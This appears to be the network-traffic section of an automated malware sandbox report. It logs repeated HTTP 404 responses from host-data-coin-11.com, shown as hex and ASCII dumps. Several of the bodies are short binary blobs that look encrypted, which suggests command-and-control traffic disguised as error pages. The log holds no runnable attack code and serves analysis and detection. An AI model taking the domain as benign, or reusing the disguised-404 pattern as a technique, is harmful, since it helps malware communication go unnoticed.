                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 11 Jan 2022 19:44:14 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 11 Jan 2022 19:44:14 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 63 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 df 1e 49 3a 44 a6 e8 de ea e4 40 fd 45 91 6e b8 57 5b 91 17 bf ec 31 e5 0d 0a 30 0d 0a 0d 0a Data Ascii: 2cI:82OI:D@EnW[10
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 11 Jan 2022 19:44:36 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 11 Jan 2022 19:44:37 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 11 Jan 2022 19:44:37 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 47 e5 a0 8f 70 bc 57 dd 43 d1 fd 20 82 22 ed c3 90 55 2a e1 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OR&:UPJ%9GpWC "U*c0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 11 Jan 2022 19:44:40 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 11 Jan 2022 19:44:41 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 11 Jan 2022 19:44:41 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 11 Jan 2022 19:44:41 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 11 Jan 2022 19:44:42 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 11 Jan 2022 19:44:42 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 11 Jan 2022 19:44:42 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 66 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 80 49 08 25 01 e5 e9 8d b0 a2 37 0d 0a 30 0d 0a 0d 0a Data Ascii: 1fI:82OI%70
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 11 Jan 2022 19:44:43 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 65 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 80 49 08 25 01 e5 e9 b4 a4 8e 0d 0a 30 0d 0a 0d 0a Data Ascii: 1eI:82OI%0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 11 Jan 2022 19:44:44 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 30 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 93 54 06 65 01 f6 a3 9e fc b9 19 eb 1b db 76 f8 67 5d a4 09 d7 cd 66 c7 64 50 06 b9 0d 0a 30 0d 0a 0d 0a Data Ascii: 30I:82OTevg]fdP0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 11 Jan 2022 19:44:45 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 36 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 94 49 01 7f 05 f1 b4 89 a1 bd 1e b6 10 da 2c b9 53 4b db 12 e1 a4 2a ef 24 41 1b b2 ed 93 5a fd 0d 86 13 82 bd 38 87 22 ed ae 8d 58 7a e2 b2 4c 29 f4 bd e3 3d a1 c8 bc 5b ab 21 96 c4 33 43 5f 6c 0c 4c 8e f2 3d e3 fe 07 c3 b2 d9 5d 91 60 9d d2 69 0d 0a 30 0d 0a 0d 0a Data Ascii: 66I:82OI,SK*$AZ8"XzL)=[!3C_lL=]`i0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 11 Jan 2022 19:44:51 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
